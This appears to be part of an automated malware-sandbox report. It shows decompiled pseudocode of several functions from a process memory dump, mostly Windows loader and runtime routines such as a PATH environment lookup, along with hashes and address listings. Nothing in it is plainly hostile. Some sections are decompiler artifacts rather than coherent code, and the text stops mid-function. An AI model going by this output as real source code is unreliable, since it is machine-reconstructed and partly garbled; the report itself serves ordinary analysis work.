API String ID: 3446177414-0
Opcode ID: 2d5765591d604082d242649d625b725284e8dcf5b4b3e3d1c60ebf7a52a9c485
Instruction ID: ae3cca5208fb4290aa07fb2871df1bb223848de92cc27bc203bb4810089a0ba0
Opcode Fuzzy Hash: 2d5765591d604082d242649d625b725284e8dcf5b4b3e3d1c60ebf7a52a9c485
Instruction Fuzzy Hash: A5316D31601B04CFDB26CF28C944BA6B3E6FF89724F14496DE49687B90EB75E801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02982581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E02982581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35, char _a1530200724, void* _a1546912404) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t236;
				signed int _t240;
				void* _t250;
				signed int _t255;
				signed int _t257;
				intOrPtr _t259;
				signed int _t262;
				signed int _t269;
				signed int _t272;
				signed int _t280;
				intOrPtr _t286;
				signed int _t288;
				signed int _t290;
				void* _t291;
				void* _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				signed int _t307;
				signed int _t311;
				intOrPtr _t326;
				signed int _t335;
				signed int _t337;
				signed int _t338;
				signed int _t342;
				signed int _t343;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				void* _t350;

				_t347 = _t349;
				_t350 = _t349 - 0x4c;
				_v8 =  *0x2a4d360 ^ _t347;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t342 = 0x2a4b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t286 = 0x48;
				_t321 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t335 = 0;
				_v37 = _t321;
				if(_v48 <= 0) {
					L16:
					_t45 = _t286 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t343 = 0xc0000106;
						goto L32;
					} else {
						_t342 = L02974620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
						_v52 = _t342;
						__eflags = _t342;
						if(_t342 == 0) {
							_t343 = 0xc0000017;
							goto L32;
						} else {
							 *(_t342 + 0x44) =  *(_t342 + 0x44) & 0x00000000;
							_t50 = _t342 + 0x48; // 0x48
							_t337 = _t50;
							_t321 = _v32;
							 *((intOrPtr*)(_t342 + 0x3c)) = _t286;
							_t288 = 0;
							 *((short*)(_t342 + 0x30)) = _v48;
							__eflags = _t321;
							if(_t321 != 0) {
								 *(_t342 + 0x18) = _t337;
								__eflags = _t321 - 0x2a48478;
								 *_t342 = ((0 | _t321 == 0x02a48478) - 0x00000001 & 0xfffffffb) + 7;
								E0299F3E0(_t337,  *((intOrPtr*)(_t321 + 4)),  *_t321 & 0x0000ffff);
								_t321 = _v32;
								_t350 = _t350 + 0xc;
								_t288 = 1;
								__eflags = _a8;
								_t337 = _t337 + (( *_t321 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t280 = E029E39F2(_t337);
									_t321 = _v32;
									_t337 = _t280;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t343 = _v68;
								__eflags = 0;
								 *((short*)(_t337 - 2)) = 0;
								goto L32;
							} else {
								_t290 = _t342 + _t288 * 4;
								_v56 = _t290;
								do {
									__eflags = _t321;
									if(_t321 != 0) {
										_t236 =  *(_v60 + _t303 * 4);
										__eflags = _t236;
										if(_t236 == 0) {
											goto L30;
										} else {
											__eflags = _t236 == 5;
											if(_t236 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t290 =  *(_v60 + _t303 * 4);
										 *(_t290 + 0x18) = _t337;
										_t240 =  *(_v60 + _t303 * 4);
										__eflags = _t240 - 8;
										if(_t240 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t240 * 4 +  &M02982959))) {
												case 0:
													__ax =  *0x2a48488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0299F3E0(__edi,  *0x2a4848c, __ax & 0x0000ffff);
														__eax =  *0x2a48488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0299F3E0(_t337, _v80, _v64);
													_t275 = _v64;
													goto L26;
												case 2:
													 *0x2a48480 & 0x0000ffff = E0299F3E0(__edi,  *0x2a48484,  *0x2a48480 & 0x0000ffff);
													__eax =  *0x2a48480 & 0x0000ffff;
													__eax = ( *0x2a48480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0299F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0299F3E0(_t337, _v76, _v36);
														_t275 = _v36;
													}
													L26:
													_t350 = _t350 + 0xc;
													_t337 = _t337 + (_t275 >> 1) * 2 + 2;
													__eflags = _t337;
													L27:
													_push(0x3b);
													_pop(_t277);
													 *((short*)(_t337 - 2)) = _t277;
													goto L28;
												case 6:
													__ebx =  *0x2a4575c;
													__eflags = __ebx - 0x2a4575c;
													if(__ebx != 0x2a4575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0299F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x2a4575c;
														} while (__ebx != 0x2a4575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x2a48478 & 0x0000ffff = E0299F3E0(__edi,  *0x2a4847c,  *0x2a48478 & 0x0000ffff);
													__eax =  *0x2a48478 & 0x0000ffff;
													__eax = ( *0x2a48478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E029E39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x2a46e58 & 0x0000ffff = E0299F3E0(__edi,  *0x2a46e5c,  *0x2a46e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x2a46e58 & 0x0000ffff;
													__eax = ( *0x2a46e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t321 = _v32;
													L29:
													_t290 = _t290 + 4;
													__eflags = _t290;
													_v56 = _t290;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t303 = _t303 + 1;
									_v16 = _t303;
									__eflags = _t303 - _v48;
								} while (_t303 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t240 =  *(_v60 + _t335 * 4);
						if(_t240 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t240 * 4 +  &M02982935))) {
							case 0:
								__ax =  *0x2a48488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t321 =  &_v64;
								_v80 = E02982E3E(0,  &_v64);
								_t286 = _t286 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x2a48480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2a48480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0296EEF0(0x2a479a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0296EB70(__ecx, 0x2a479a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t214 = _v72;
											__eflags = _t214;
											if(_t214 != 0) {
												L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
											}
											_t215 = _v52;
											__eflags = _t215;
											if(_t215 != 0) {
												__eflags = _t343;
												if(_t343 < 0) {
													L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
													_t215 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t299 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x2a47b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0296EB70(__ecx, 0x2a479a0);
										__eax = _v52;
										L36:
										_pop(_t336);
										_pop(_t344);
										__eflags = _v8 ^ _t347;
										_pop(_t287);
										return E0299B640(_t215, _t287, _v8 ^ _t347, _t321, _t336, _t344);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t282 = _v56;
								if(_v56 != 0) {
									_t321 =  &_v36;
									_t284 = E02982E3E(_t282,  &_v36);
									_t299 = _v36;
									_v76 = _t284;
								}
								if(_t299 == 0) {
									goto L44;
								} else {
									_t286 = _t286 + 2 + _t299;
								}
								goto L14;
							case 6:
								__eax =  *0x2a45764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x2a48478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x2a48478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x2a46e58 & 0x0000ffff;
								__eax = ( *0x2a46e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t335 = _t335 + 1;
								if(_t335 >= _v48) {
									goto L16;
								} else {
									_t321 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					_t249 = _t240 +  *((intOrPtr*)(_t342 + 0x28)) + _t240 +  *((intOrPtr*)(_t342 + 0x28)) +  *((intOrPtr*)(_t342 + 0x28)) +  *0x1f029826;
					_t291 = 0x25;
					asm("pushfd");
					asm("pushfd");
					_t250 = _t240 +  *((intOrPtr*)(_t342 + 0x28)) + _t240 +  *((intOrPtr*)(_t342 + 0x28)) +  *((intOrPtr*)(_t342 + 0x28)) +  *0x1f029826 +  *((intOrPtr*)(_t321 +  *((intOrPtr*)(_t249 +  &_a1530200724))));
					 *((intOrPtr*)(_t250 - 0x67d77ffe)) =  *((intOrPtr*)(_t250 - 0x67d77ffe)) - _t291;
					asm("daa");
					 *((intOrPtr*)(_t250 - 0x67d7b1fe)) =  *((intOrPtr*)(_t250 - 0x67d7b1fe)) - _t291 +  *_t342;
					_pop(_t295);
					asm("pushfd");
					asm("pushfd");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x2a2ff00);
					E029AD08C(_t295, _t337, _t342);
					_v44 =  *[fs:0x18];
					_t338 = 0;
					 *_a24 = 0;
					_t296 = _a12;
					__eflags = _t296;
					if(_t296 == 0) {
						_t255 = 0xc0000100;
					} else {
						_v8 = 0;
						_t345 = 0xc0000100;
						_v52 = 0xc0000100;
						_t257 = 4;
						while(1) {
							_v40 = _t257;
							__eflags = _t257;
							if(_t257 == 0) {
								break;
							}
							_t311 = _t257 * 0xc;
							_v48 = _t311;
							__eflags = _t296 -  *((intOrPtr*)(_t311 + 0x2931664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t272 = E0299E5C0(_a8,  *((intOrPtr*)(_t311 + 0x2931668)), _t296);
									_t350 = _t350 + 0xc;
									__eflags = _t272;
									if(__eflags == 0) {
										_t345 = E029D51BE(_t296,  *((intOrPtr*)(_v48 + 0x293166c)), _a16, _t338, _t345, __eflags, _a20, _a24);
										_v52 = _t345;
										break;
									} else {
										_t257 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t257 = _t257 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t345;
						__eflags = _t345;
						if(_t345 < 0) {
							__eflags = _t345 - 0xc0000100;
							if(_t345 == 0xc0000100) {
								_t307 = _a4;
								__eflags = _t307;
								if(_t307 != 0) {
									_v36 = _t307;
									__eflags =  *_t307 - _t338;
									if( *_t307 == _t338) {
										_t345 = 0xc0000100;
										goto L76;
									} else {
										_t326 =  *((intOrPtr*)(_v44 + 0x30));
										_t259 =  *((intOrPtr*)(_t326 + 0x10));
										__eflags =  *((intOrPtr*)(_t259 + 0x48)) - _t307;
										if( *((intOrPtr*)(_t259 + 0x48)) == _t307) {
											__eflags =  *(_t326 + 0x1c);
											if( *(_t326 + 0x1c) == 0) {
												L106:
												_t345 = E02982AE4( &_v36, _a8, _t296, _a16, _a20, _a24);
												_v32 = _t345;
												__eflags = _t345 - 0xc0000100;
												if(_t345 != 0xc0000100) {
													goto L69;
												} else {
													_t338 = 1;
													_t307 = _v36;
													goto L75;
												}
											} else {
												_t262 = E02966600( *(_t326 + 0x1c));
												__eflags = _t262;
												if(_t262 != 0) {
													goto L106;
												} else {
													_t307 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t345 = E02982C50(_t307, _a8, _t296, _a16, _a20, _a24, _t338);
											L76:
											_v32 = _t345;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0296EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t345 = _a24;
									_t269 = E02982AE4( &_v36, _a8, _t296, _a16, _a20, _t345);
									_v32 = _t269;
									__eflags = _t269 - 0xc0000100;
									if(_t269 == 0xc0000100) {
										_v32 = E02982C50(_v36, _a8, _t296, _a16, _a20, _t345, 1);
									}
									_v8 = _t338;
									E02982ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t255 = _t345;
					}
					L70:
					return E029AD0D1(_t255);
				}
				L108:
			}

0x02982584
0x02982586
0x02982590
0x02982596
0x02982597
0x02982598
0x02982599
0x0298259e
0x029825a4
0x029825a9
0x029825ac
0x029825ae
0x029825b1
0x029825b2
0x029825b5
0x029825b8
0x029825bb
0x029825bc
0x029825bf
0x029825c2
0x029825c5
0x029825c6
0x029825cb
0x029825ce
0x029825d8
0x029825dd
0x029825de
0x029825e1
0x029825e3
0x029825e9
0x029826da
0x029826da
0x029826dd
0x029826e2
0x029c5b56
0x00000000
0x029826e8
0x029826f9
0x029826fb
0x029826fe
0x02982700
0x029c5b60
0x00000000
0x02982706
0x02982706
0x0298270a
0x0298270a
0x0298270d
0x02982713
0x02982716
0x02982718
0x0298271c
0x0298271e
0x029c5b6c
0x029c5b6f
0x029c5b7f
0x029c5b89
0x029c5b8e
0x029c5b93
0x029c5b96
0x029c5b9c
0x029c5ba0
0x029c5ba3
0x029c5bab
0x029c5bb0
0x029c5bb3
0x029c5bb3
0x029c5ba3
0x02982724
0x02982726
0x02982729
0x0298272c
0x0298279d
0x0298279d
0x029827a0
0x029827a2
0x00000000
0x0298272e
0x0298272e
0x02982731
0x02982734
0x02982734
0x02982736
0x029c5bc1
0x029c5bc1
0x029c5bc4
0x00000000
0x029c5bca
0x029c5bca
0x029c5bcd
0x00000000
0x029c5bd3
0x00000000
0x029c5bd3
0x029c5bcd
0x0298273c
0x0298273c
0x02982742
0x02982747
0x0298274a
0x0298274d
0x02982750
0x00000000
0x02982756
0x02982756
0x00000000
0x02982902
0x02982908
0x0298290b
0x00000000
0x02982911
0x0298291c
0x02982921
0x00000000
0x02982921
0x00000000
0x00000000
0x02982880
0x02982887
0x0298288c
0x00000000
0x00000000
0x02982805
0x0298280a
0x02982814
0x02982816
0x00000000
0x00000000
0x0298281e
0x02982821
0x02982823
0x00000000
0x02982829
0x02982829
0x02982831
0x0298283c
0x0298283e
0x00000000
0x0298283e
0x00000000
0x00000000
0x0298284e
0x02982850
0x02982851
0x02982854
0x02982857
0x0298285a
0x0298285c
0x0298285d
0x00000000
0x00000000
0x0298275d
0x02982761
0x00000000
0x02982767
0x0298276e
0x02982773
0x02982773
0x02982776
0x02982778
0x0298277e
0x0298277e
0x02982781
0x02982781
0x02982783
0x02982784
0x00000000
0x00000000
0x029c5bd8
0x029c5bde
0x029c5be4
0x029c5be6
0x029c5be8
0x029c5be9
0x029c5bee
0x029c5bf8
0x029c5bff
0x029c5c01
0x029c5c04
0x029c5c07
0x029c5c0b
0x029c5c0d
0x029c5c0d
0x029c5c15
0x029c5c18
0x029c5c1b
0x029c5c1b
0x029c5c1e
0x00000000
0x00000000
0x029828c3
0x029828c8
0x029828d2
0x029828d4
0x029828d8
0x029828db
0x029c5c26
0x029c5c28
0x029c5c2d
0x029c5c2d
0x00000000
0x00000000
0x029c5c34
0x029c5c36
0x029c5c49
0x029c5c4e
0x029c5c54
0x029c5c5b
0x029c5c5d
0x029c5c60
0x02982788
0x02982788
0x0298278b
0x0298278e
0x0298278e
0x0298278e
0x02982791
0x00000000
0x00000000
0x02982756
0x02982750
0x00000000
0x02982794
0x02982794
0x02982795
0x02982798
0x02982798
0x00000000
0x02982734
0x0298272c
0x02982700
0x029825ef
0x029825ef
0x029825ef
0x029825f2
0x029825f8
0x00000000
0x00000000
0x029825fe
0x00000000
0x029828e6
0x029828ec
0x029828ef
0x029828f5
0x029828f8
0x029828f8
0x00000000
0x029828f8
0x00000000
0x00000000
0x02982866
0x02982866
0x02982876
0x02982879
0x00000000
0x00000000
0x029827e0
0x029827e7
0x029827e9
0x029827eb
0x029c5afd
0x00000000
0x029c5afd
0x00000000
0x00000000
0x02982633
0x02982638
0x0298263b
0x0298263c
0x0298263e
0x02982640
0x02982642
0x02982647
0x02982649
0x0298264e
0x02982650
0x02982653
0x02982659
0x029826a2
0x029826a7
0x029826ac
0x029826b2
0x029c5b11
0x029c5b15
0x029c5b17
0x00000000
0x029826b8
0x029826b8
0x029826ba
0x029827a6
0x029827a6
0x029827a9
0x029827ab
0x029827b9
0x029827b9
0x029827be
0x029827c1
0x029827c3
0x029827c5
0x029827c7
0x029c5c74
0x029c5c79
0x029c5c79
0x029827c7
0x00000000
0x029826c0
0x029826c0
0x029826c3
0x029826c6
0x029826c6
0x029826c9
0x029826c9
0x00000000
0x029826c9
0x029826ba
0x0298265b
0x0298265b
0x0298265e
0x02982667
0x0298266d
0x02982677
0x0298267c
0x0298267f
0x02982681
0x029c5b49
0x029c5b4e
0x029827cd
0x029827d0
0x029827d1
0x029827d2
0x029827d4
0x029827dd
0x02982687
0x02982687
0x0298268a
0x0298268b
0x0298268e
0x0298268f
0x02982691
0x02982696
0x02982698
0x0298269d
0x0298269f
0x00000000
0x0298269f
0x02982681
0x00000000
0x00000000
0x02982846
0x00000000
0x00000000
0x02982605
0x0298260a
0x0298260c
0x02982611
0x02982616
0x02982619
0x02982619
0x0298261e
0x00000000
0x02982624
0x02982627
0x02982627
0x00000000
0x00000000
0x029c5b1f
0x00000000
0x00000000
0x02982894
0x0298289b
0x0298289d
0x029828a1
0x029c5b2b
0x029c5b2e
0x029c5b2e
0x029828a7
0x029828a9
0x029c5b04
0x029c5b09
0x029c5b09
0x029c5b09
0x00000000
0x00000000
0x029c5b35
0x029c5b3c
0x029828fb
0x029828fb
0x029826cc
0x029826cc
0x029826d0
0x00000000
0x029826d2
0x029826d2
0x00000000
0x029826d2
0x00000000
0x00000000
0x029825fe
0x0298292d
0x02982930
0x02982935
0x0298293e
0x02982948
0x0298294e
0x0298294f
0x02982957
0x02982958
0x0298295a
0x02982962
0x02982966
0x02982972
0x02982973
0x0298297b
0x0298297e
0x0298297f
0x02982980
0x02982981
0x02982982
0x02982983
0x02982984
0x02982985
0x02982986
0x02982987
0x02982988
0x02982989
0x0298298a
0x0298298b
0x0298298c
0x0298298d
0x0298298e
0x0298298f
0x02982990
0x02982992
0x02982997
0x029829a3
0x029829a6
0x029829ab
0x029829ad
0x029829b0
0x029829b2
0x029c5c80
0x029829b8
0x029829b8
0x029829bb
0x029829c0
0x029829c5
0x029829c6
0x029829c6
0x029829c9
0x029829cb
0x00000000
0x00000000
0x029829cd
0x029829d0
0x029829d9
0x029829db
0x029829dd
0x02982a7f
0x02982a84
0x02982a87
0x02982a89
0x029c5ca1
0x029c5ca3
0x00000000
0x02982a8f
0x02982a8f
0x00000000
0x02982a8f
0x00000000
0x029829e3
0x029829e3
0x029829e3
0x00000000
0x029829e3
0x029829dd
0x00000000
0x029829db
0x029829e6
0x029829e9
0x029829eb
0x029829ed
0x029829f3
0x029829f5
0x029829f8
0x029829fa
0x02982a97
0x02982a9a
0x02982a9d
0x02982add
0x00000000
0x02982a9f
0x02982aa2
0x02982aa5
0x02982aa8
0x02982aab
0x029c5cab
0x029c5caf
0x029c5cc5
0x029c5cda
0x029c5cdc
0x029c5cdf
0x029c5ce5
0x00000000
0x029c5ceb
0x029c5ced
0x029c5cee
0x00000000
0x029c5cee
0x029c5cb1
0x029c5cb4
0x029c5cb9
0x029c5cbb
0x00000000
0x029c5cbd
0x029c5cbd
0x00000000
0x029c5cbd
0x029c5cbb
0x02982ab1
0x02982ab1
0x02982ac4
0x02982ac6
0x02982ac6
0x00000000
0x02982ac6
0x02982aab
0x00000000
0x02982a00
0x02982a09
0x02982a0e
0x02982a21
0x02982a24
0x02982a35
0x02982a3a
0x02982a3d
0x02982a42
0x02982a59
0x02982a59
0x02982a5c
0x02982a5f
0x02982a5f
0x029829fa
0x029829f3
0x02982a64
0x02982a64
0x02982a6b
0x02982a6b
0x02982a6d
0x02982a72
0x02982a72
0x00000000

Strings

PATH, xrefs: 02982642, 02982691

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 1328f29b3f21c99a29a7ba9413169c159e4e6a304b6a8c5a3ead7cedef17eb75
Instruction ID: 3ee5785fb1e3b934a455be937aa6fb24b92c0a59600666dc8cd8ade49626565d
Opcode Fuzzy Hash: 1328f29b3f21c99a29a7ba9413169c159e4e6a304b6a8c5a3ead7cedef17eb75
Instruction Fuzzy Hash: F8C19FB5E00259EFCB15EF99D880BAEB7F5FF88714F584429E801BB250DB35A941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0295C962, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0295C962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x2a4d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0296EEF0(0x2a470a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E029DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0296EB70(_t29, 0x2a470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0299B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E029DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x2a470c0; // 0x0
					while(_t38 != 0x2a470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x2a4b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0295c96a
0x0295c974
0x0295c988
0x0295c98a
0x029c7c9d
0x029c7c9f
0x029c7ca4
0x029c7cae
0x029c7cf0
0x029c7cf5
0x029c7cfa
0x0295c992
0x0295c996
0x0295c997
0x0295c998
0x0295c9a3
0x0295c9a3
0x029c7cb0
0x029c7cb7
0x029c7cbb
0x00000000
0x00000000
0x029c7cbd
0x029c7ce8
0x029c7cc5
0x029c7cc8
0x029c7cca
0x029c7cd0
0x029c7cd6
0x029c7cde
0x029c7ce4
0x029c7ce4
0x029c7cd0
0x00000000
0x029c7ce8
0x0295c990
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bebeedc77d3c616e141f63e18318d81b268491b108e85ae4c174815d40583d
Instruction ID: b4af7b326ad329e167836b96c3b3219f98c0a816e91d488c4d0e748e952f4fca
Opcode Fuzzy Hash: 03bebeedc77d3c616e141f63e18318d81b268491b108e85ae4c174815d40583d
Instruction Fuzzy Hash: CA11CE327406469BDB10AF69DC85A6BF7EABBC4714B10092DE84283A50EF21FC10CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0298FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0298FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0296EEF0(0x2a47b60);
					_t134 =  *0x2a47b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x2a47b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2a47b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
